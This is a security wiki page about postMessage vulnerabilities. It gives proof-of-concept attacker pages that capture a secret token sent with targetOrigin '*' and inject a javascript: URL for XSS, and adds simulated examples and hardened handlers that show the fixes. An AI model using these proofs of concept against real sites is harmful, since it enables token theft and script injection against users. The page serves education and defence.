
postMessage issues

EdOverflow edited this page Jul 28, 2018 · 1 revision

Secret token leakage

Suppose a web page contains the following code, where token holds a secret token or access code:

var token = "secret";
window.opener.postMessage(token, '*');

There is no origin check: the page sends the value of token to whatever window.opener points to, and the targetOrigin of '*' tells the browser to deliver the message no matter which origin that window is currently showing. An attacker can therefore open the target page from a page they control (which makes the attacker's page the opener) and simply listen for the message on their side:

<html>
<head>
    <title>PoC</title>
    <script>
    // The victim page posts the token string itself as the message, so the
    // payload is event.data (not event.data.token). event.origin tells us
    // which origin sent it.
    function listener(event) {
        document.getElementById("message").textContent =
            "Your secret token is " + event.data + " (sent by " + event.origin + ")";
    }
    if (window.addEventListener) {
        addEventListener("message", listener, false);
    } else {
        attachEvent("onmessage", listener); // legacy IE fallback
    }
    </script>
</head>
<body>
    <!-- Opening the target from here makes this page its window.opener -->
    <a href="#" onclick="window.open('https://victim.tld/endpoint')">Click me!</a>
    <div id="message"></div>
</body>
</html>
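To make the delivery rule concrete, here is an added example (not code from the original page or from the research it cites) that models the browser's postMessage targetOrigin check with a small stand-in window object, then runs the page's leaky pattern and a hardened one against an attacker-controlled opener and a trusted opener. FakeWindow, the origins (https://attacker.tld, https://app.victim.tld) and the token value are all constructed for this demo.

```javascript
// Added example, not code from the original page. A small stand-in for the
// browser's postMessage delivery rule, used to show why targetOrigin '*' hands
// the token to whatever page called window.open() on us, and why naming the
// trusted origin stops that. FakeWindow, the origins and the token are
// constructed for this demo.

class FakeWindow {
  constructor(origin) {
    this.origin = origin;   // origin of the document currently in this window
    this.opener = null;     // set by the page that opened us
    this.received = [];     // MessageEvent-like records that reached a listener
  }
}

// Browser rule: the message is delivered only if targetOrigin is '*' or
// equals the target window's current origin; otherwise it is silently
// dropped. Returns true when delivered.
function postMessageFrom(sender, target, data, targetOrigin) {
  if (targetOrigin !== '*' && targetOrigin !== target.origin) return false;
  target.received.push({ data: data, origin: sender.origin, source: sender });
  return true;
}

// The page's own pattern: the token goes to wherever window.opener points.
function leakyShareToken(page, token) {
  return postMessageFrom(page, page.opener, token, '*');
}

// Hardened pattern: only a window currently showing trustedOrigin can get it.
function safeShareToken(page, token, trustedOrigin) {
  return postMessageFrom(page, page.opener, token, trustedOrigin);
}

// Simulate: a page at openerOrigin runs window.open('https://victim.tld/endpoint'),
// then the victim page runs `send`. Returns the data the opener received.
function run(openerOrigin, send) {
  const opener = new FakeWindow(openerOrigin);
  const victim = new FakeWindow('https://victim.tld');
  victim.opener = opener;
  send(victim);
  return opener.received.map(e => e.data);
}

const TRUSTED = 'https://app.victim.tld'; // assumed legitimate opener origin

const leakedToAttacker = run('https://attacker.tld',
  v => leakyShareToken(v, 'secret'));                  // ['secret']
const blockedForAttacker = run('https://attacker.tld',
  v => safeShareToken(v, 'secret', TRUSTED));          // []
const deliveredToTrusted = run(TRUSTED,
  v => safeShareToken(v, 'secret', TRUSTED));          // ['secret']

console.log({ leakedToAttacker, blockedForAttacker, deliveredToTrusted });
```

Naming the targetOrigin is the sender-side fix; the receiving page should still compare event.origin against an allowlist before trusting anything it is sent, since the two checks protect against different mistakes (leaking to the wrong window versus accepting from the wrong window).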

XSS via postMessage

Suppose the target page parses received messages as JSON and renders a field into an HTML attribute without validating it. For example, the message {"origin": "hello"} becomes <a href="hello">Go to previous page</a>. Because the handler neither checks event.origin nor validates the value, an attacker can inject a javascript: URL, which runs when the link is clicked:

<a href="#" onclick="xss()">click me</a>
<script>
function xss() {
    var win = window.open('https://victim.tld/endpoint', '_blank');
    // Wait for the target to load and register its message listener. A fixed
    // delay is a race; increase it or resend if the payload does not land.
    setTimeout(function() {
        // '*' delivers regardless of the target window's origin; the bug is
        // that the receiver never checks event.origin before parsing the JSON
        // and writing the value into the href attribute.
        win.postMessage('{"origin": "javascript:alert(1)"}', '*');
    }, 1000);
}
</script>
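The receiving side of this scenario, as an added example (not code from the original page or from the research it cites): a handler of the shape the section describes, first as the vulnerable version and then hardened with a sender-origin allowlist, defensive parsing and URL validation before the value reaches an href. PAGE_ORIGIN, TRUSTED_SENDERS and the sample MessageEvent-like objects are constructed for this demo; nothing touches the DOM, each handler returns the href it would set, or null when it refuses the message.

```javascript
// Added example, not code from the original page. A message handler of the
// shape the section describes (a JSON message whose "origin" field ends up in
// an href), first vulnerable and then hardened. PAGE_ORIGIN, TRUSTED_SENDERS
// and the sample events are constructed for this demo.

const PAGE_ORIGIN = 'https://victim.tld';
const TRUSTED_SENDERS = new Set(['https://app.victim.tld']);

// Vulnerable: whatever the message carries becomes the href, from any sender.
// (The message field happens to be named "origin"; it is unrelated to
// event.origin, which is the sender's origin and is set by the browser.)
function vulnerableHandler(event) {
  const msg = JSON.parse(event.data);
  return msg.origin;             // 'javascript:alert(1)' lands in <a href>
}

// Resolve a candidate against the page and accept it only as a same-origin
// http(s) URL. The URL parser lowercases the scheme and strips leading
// whitespace, so "JavaScript:alert(1)" and "\tjavascript:..." are caught too.
function safeHref(candidate) {
  let url;
  try { url = new URL(candidate, PAGE_ORIGIN); } catch (e) { return null; }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null;
  if (url.origin !== PAGE_ORIGIN) return null;   // it is a "previous page" link
  return url.href;
}

// Hardened: check who sent it, parse defensively, validate before rendering.
function hardenedHandler(event) {
  if (!TRUSTED_SENDERS.has(event.origin)) return null;
  let msg;
  try { msg = JSON.parse(event.data); } catch (e) { return null; }
  if (msg === null || typeof msg !== 'object' || typeof msg.origin !== 'string') return null;
  return safeHref(msg.origin);
}

// Constructed MessageEvent-like objects (only the two fields the handlers use).
const attackerEvent = { origin: 'https://attacker.tld',
                        data: '{"origin": "javascript:alert(1)"}' };
const trustedBadValue = { origin: 'https://app.victim.tld',
                          data: '{"origin": "JavaScript:alert(1)"}' };
const trustedOffsite  = { origin: 'https://app.victim.tld',
                          data: '{"origin": "https://evil.tld/"}' };
const trustedGood     = { origin: 'https://app.victim.tld',
                          data: '{"origin": "/account?tab=1"}' };
const trustedGarbage  = { origin: 'https://app.victim.tld', data: 'not json' };

console.log(vulnerableHandler(attackerEvent));   // javascript:alert(1)
console.log(hardenedHandler(attackerEvent));     // null  (untrusted sender)
console.log(hardenedHandler(trustedBadValue));   // null  (javascript: scheme)
console.log(hardenedHandler(trustedOffsite));    // null  (cross-origin link)
console.log(hardenedHandler(trustedGood));       // https://victim.tld/account?tab=1
console.log(hardenedHandler(trustedGarbage));    // null  (unparseable)
```

The origin allowlist alone is not enough if a trusted sender can itself be influenced, which is why the value is validated as a URL with an explicit scheme and origin check rather than by string-matching for "javascript:".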

This page was compiled with the help of Ron Chan's research at https://ngailong.wordpress.com/2018/02/13/the-mystery-of-postmessage/
